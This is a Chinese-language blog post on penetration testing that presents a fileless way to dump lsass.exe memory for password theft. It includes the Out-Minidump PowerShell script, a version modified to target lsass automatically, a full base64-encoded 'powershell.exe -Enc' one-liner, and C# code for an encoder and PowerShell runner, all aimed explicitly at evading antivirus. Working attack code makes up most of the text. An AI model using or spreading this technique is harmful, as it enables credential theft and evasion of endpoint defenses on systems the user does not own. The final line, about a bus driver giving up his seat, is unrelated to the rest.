渗透者无exe dump内存

发布于 2019-09-09  44 次阅读


在渗透过程中经常需要对对方密码进行获取
常见为 GetPwd,以及Mimikatz,但是这些工具往往会被杀的很厉害,
直接用procdump也必须上传EXE行为比较大,于是对dump lsass.exe内存进行研究

现摘取网上一段 迷你dump ,powershell脚本代码

function Out-Minidump
{
[CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[System.Diagnostics.Process]
$Process ,
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD
)
BEGIN
{
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,$ProcessId,$FileStream.SafeFileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
Get-ChildItem $ProcessDumpPath
}
}
END {}
}

执行方法:
//Out-Minidump -Process (Get-Process -Id 4293)
//Get-Process lsass | Out-Minidump

执行起来过于麻烦 而且是没有加密的 容易被拦截查杀 ,随对代码进行整改
修改后一句执行:

Param (
[Parameter(Position = 0)] 
[System.Diagnostics.Process]
$Process = (Get-Process lsass),
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD
)
BEGIN
{
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,$ProcessId,$FileStream.SafeFileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
Get-ChildItem $ProcessDumpPath
}
}
END {}

修改后的脚本可以直接执行 一键dump 随后进行加密

转换base64一句后 :

powershell.exe -Enc IABQAGEAcgBhAG0AIAAoAA0ACgAJACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAwACkAXQAgAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQANAAoAIAAgACAAIAAgACAAIAAgACQAUAByAG8AYwBlAHMAcwAgAD0AIAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGwAcwBhAHMAcwApACwADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuACAAPQAgADEAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBWAGEAbABpAGQAYQB0AGUAUwBjAHIAaQBwAHQAKAB7ACAAVABlAHMAdAAtAFAAYQB0AGgAIAAkAF8AIAB9ACkAXQANAAoAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQANAAoAIAAgACAAIAAgACAAIAAgACQARAB1AG0AcABGAGkAbABlAFAAYQB0AGgAIAA9ACAAJABQAFcARAANAAoAIAAgACAAIAApAA0ACgAgAA0ACgAgACAAIAAgAEIARQBHAEkATgANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABXAEUAUgAgAD0AIABbAFAAUwBPAGIAagBlAGMAdABdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFcAaQBuAGQAbwB3AHMARQByAHIAbwByAFIAZQBwAG8AcgB0AGkAbgBnACcAKQANAAoAIAAgACAAIAAgACAAIAAgACQAVwBFAFIATgBhAHQAaQB2AGUATQBlAHQAaABvAGQAcwAgAD0AIAAkAFcARQBSAC4ARwBlAHQATgBlAHMAdABlAGQAVAB5AHAAZQAoACcATgBhAHQAaQB2AGUATQBlAHQAaABvAGQAcwAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACcAKQANAAoAIAAgACAAIAAgACAAIAAgACQARgBsAGEAZwBzACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEIAaQBuAGQAaQBuAGcARgBsAGEAZwBzAF0AIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAIABTAHQAYQB0AGkAYwAnAA0ACgAgACAAIAAgACAAIAAgACAAJABNAGkAbgBpAEQAdQBtAHAAVwByAGkAdABlAEQAdQBtAHAAIAA9ACAAJABXAEUAUgBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAE0AaQBuAGkARAB1AG0AcABXAHIAaQB0AGUARAB1AG0AcAAnACwAIAAkAEYAbABhAGcAcwApAA0ACgAgACAAIAAgACAAIAAgACAAJABNAGkAbgBpAEQAdQBtAHAAVwBpAHQAaABGAHUAbABsAE0AZQBtAG8AcgB5ACAAPQAgAFsAVQBJAG4AdAAzADIAXQAgADIADQAKACAAIAAgACAAfQANAAoAIAANAAoAIAAgACAAIABQAFIATwBDAEUAUwBTAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAFAAcgBvAGMAZQBzAHMASQBkACAAPQAgACQAUAByAG8AYwBlAHMAcwAuAEkAZAANAAoAIAAgACAAIAAgACAAIAAgACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACAAPQAgACQAUAByAG8AYwBlAHMAcwAuAE4AYQBtAGUADQAKACAAIAAgACAAIAAgACAAIAAkAFAAcgBvAGMAZQBzAHMASABhAG4AZABsAGUAIAA9ACAAJABQAHIAbwBjAGUAcwBzAC4ASABhAG4AZABsAGUADQAKACAAIAAgACAAIAAgACAAIAAkAFAAcgBvAGMAZQBzAHMARgBpAGwAZQBOAGEAbQBlACAAPQAgACIAJAAoACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACkAXwAkACgAJABQAHIAbwBjAGUAcwBzAEkAZAApAC4AZABtAHAAIgANAAoAIAAgACAAIAAgACAAIAAgACAAJABQAHIAbwBjAGUAcwBzAEQAdQBtAHAAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQARAB1AG0AcABGAGkAbABlAFAAYQB0AGgAIAAkAFAAcgBvAGMAZQBzAHMARgBpAGwAZQBOAGEAbQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAkAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AKAAkAFAAcgBvAGMAZQBzAHMARAB1AG0AcABQAGEAdABoACwAIABbAEkATwAuAEYAaQBsAGUATQBvAGQAZQBdADoAOgBDAHIAZQBhAHQAZQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAkAFIAZQBzAHUAbAB0ACAAPQAgACQATQBpAG4AaQBEAHUAbQBwAFcAcgBpAHQAZQBEAHUAbQBwAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAkAFAAcgBvAGMAZQBzAHMASABhAG4AZABsAGUALAAkAFAAcgBvAGMAZQBzAHMASQBkACwAJABGAGkAbABlAFMAdAByAGUAYQBtAC4AUwBhAGYAZQBGAGkAbABlAEgAYQBuAGQAbABlACwAJABNAGkAbgBpAEQAdQBtAHAAVwBpAHQAaABGAHUAbABsAE0AZQBtAG8AcgB5ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAJABGAGkAbABlAFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQANAAoAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAtAG4AbwB0ACAAJABSAGUAcwB1AGwAdAApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABFAHgAYwBlAHAAdABpAG8AbgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQwBvAG0AcABvAG4AZQBuAHQATQBvAGQAZQBsAC4AVwBpAG4AMwAyAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAeABjAGUAcAB0AGkAbwBuAE0AZQBzAHMAYQBnAGUAIAA9ACAAIgAkACgAJABFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgACgAJAAoACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACkAOgAkACgAJABQAHIAbwBjAGUAcwBzAEkAZAApACkAIgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjACAAUgBlAG0AbwB2AGUAIABhAG4AeQAgAHAAYQByAHQAaQBhAGwAbAB5ACAAdwByAGkAdAB0AGUAbgAgAGQAdQBtAHAAIABmAGkAbABlAHMALgAgAEYAbwByACAAZQB4AGEAbQBwAGwAZQAsACAAYQAgAHAAYQByAHQAaQBhAGwAIABkAHUAbQBwACAAdwBpAGwAbAAgAGIAZQAgAHcAcgBpAHQAdABlAG4ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIABpAG4AIAB0AGgAZQAgAGMAYQBzAGUAIAB3AGgAZQBuACAAMwAyAC0AYgBpAHQAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdAByAGkAZQBzACAAdABvACAAZAB1AG0AcAAgAGEAIAA2ADQALQBiAGkAdAAgAHAAcgBvAGMAZQBzAHMALgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABQAHIAbwBjAGUAcwBzAEQAdQBtAHAAUABhAHQAaAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB0AGgAcgBvAHcAIAAkAEUAeABjAGUAcAB0AGkAbwBuAE0AZQBzAHMAYQBnAGUADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAFAAcgBvAGMAZQBzAHMARAB1AG0AcABQAGEAdABoAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACAARQBOAEQAIAB7AH0A

一句就可以对 lsass.exe的内存进行dump
执行截图(需要管理员权限的powershell)

发现加密base64还有一个宽字节问题否则加密后不可用,随对加密工具进行编写

主要代码如下

private void button1_Click(object sender, EventArgs e)
    {
        try {

            byte[] bt = System.Text.Encoding.Unicode.GetBytes(this.textBox1.Text);
            string str = Convert.ToBase64String(bt);
            if (checkBox1.Checked)
                str = "powershell.exe -Enc " + str;
            this.textBox2.Text = str;
            Clipboard.SetDataObject(this.textBox2.Text);

        } catch(Exception ex)
        {
            MessageBox.Show(ex.ToString());
        }

    }
    public static string DecodeBase64(Encoding encode, string result)
    {
        string decode = "";
        byte[] bytes = Convert.FromBase64String(result);
        try
        {
            decode = encode.GetString(bytes);
        }
        catch
        {
            decode = result;
        }
        return decode;
    }

    private void button2_Click(object sender, EventArgs e)
    {
        try {

            string src = this.textBox2.Text;
            if (src.Contains("powershell.exe -Enc"))
            {
                src = src.Replace("powershell.exe -Enc", "");
            }
            src = src.Trim();

            this.textBox1.Text = DecodeBase64(System.Text.Encoding.Unicode, src);
            Clipboard.SetDataObject(this.textBox1.Text);

        } catch(Exception ex)
        {
            MessageBox.Show(ex.ToString());

        }
    }
private static string RunScript(string scriptText)  //运行脚本
    {

        // create Powershell runspace

        Runspace runspace = RunspaceFactory.CreateRunspace();

        // open it

        runspace.Open();

        // create a pipeline and feed it the script text

        Pipeline pipeline = runspace.CreatePipeline();

        pipeline.Commands.AddScript(scriptText);

        pipeline.Commands.Add("Out-String");

        // execute the script

        Collection<PSObject> results = pipeline.Invoke();

        // close the runspace

        runspace.Close();

        // convert the script result into a single string

        StringBuilder stringBuilder = new StringBuilder();

        foreach (PSObject obj in results)
        {

            stringBuilder.AppendLine(obj.ToString());

        }

        return stringBuilder.ToString();

    }
    public void RunScript(List<string> scripts) //执行后 管道获取结果输出
    {
        try
        {
            Runspace runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();
            Pipeline pipeline = runspace.CreatePipeline();
            foreach (var scr in scripts)
            {
                pipeline.Commands.AddScript(scr);
            }
            //返回结果   
            var results = pipeline.Invoke();
            runspace.Close();

        }
        catch (Exception e)
        {
           MessageBox.Show(DateTime.Now.ToString() + "日志记录:执行ps命令异常:" + e.Message);
        }

    }

公交车司机终于在众人的指责中将座位让给了老太太